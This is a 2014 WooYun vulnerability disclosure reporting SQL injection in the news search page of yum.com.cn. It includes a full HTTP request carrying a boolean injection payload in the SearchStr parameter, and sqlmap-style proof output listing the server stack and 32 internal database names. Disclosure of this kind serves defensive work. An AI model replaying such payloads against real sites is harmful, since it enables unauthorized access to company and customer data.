当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083367

漏洞标题:百胜餐饮集团中国事业部某处SQL注入

相关厂商:yum.com.cn

漏洞作者: pandada

提交时间:2014-11-15 12:00

修复时间:2014-12-30 12:02

公开时间:2014-12-30 12:02

漏洞类型:

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百胜餐饮集团中国事业部隶属于美国纽约证券交易所挂牌上市的百胜餐饮集团(Yum! Brands,Inc.)。百胜餐饮集团是全球餐厅网络最大的餐饮集团之一,在全球超过125个国家和地区拥有超过39000家连锁餐厅, 员工人数150多万。百胜餐饮集团旗下肯德基、必胜客和塔可钟三个餐饮品牌分别在烹鸡、比萨、墨西哥风味食品连锁餐饮领域居全球领导地位。2013年,百胜餐饮集团荣获美国《企业责任杂志》评选的“100家最佳企业公民”。

详细说明:

注入点为SearchStr

GET /news_search_result.aspx?SearchStr=e%25'%20AND%203*2*1%3d6%20AND%20'000c9fZ'%21%3d'000c9fZ%25 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.yum.com.cn:80/
Cookie: NSC_CX_QfstjtufodzHspvq=ffffffff09320b0445525d5f4f58455e445a4a423660
Host: www.yum.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

漏洞证明:

web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [32]:
[*] [YUM-PHD]
[*] DFJB
[*] dfjb_new
[*] Email_service
[*] kfchealth
[*] KFCII
[*] kfcmusic2011
[*] LansumEdm
[*] LittleSheep2013
[*] master
[*] model
[*] msdb
[*] phdi2011
[*] phdi2014
[*] phduty
[*] PHParty
[*] PizzaHut
[*] tempdb
[*] xfy
[*] xfyAAA
[*] xfyqa
[*] YUM
[*] YumCampaignSystem
[*] YumService
[*] YumStore
[*] YumStore20141107
[*] YumstoreAAA
[*] YumStoreVisited
[*] YumStoreVisited_new
[*] YumStoreVisitedAAA
[*] YumSupplier
[*] Yumyouhui

修复方案:

参数过滤

版权声明:转载请注明来源 pandada@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝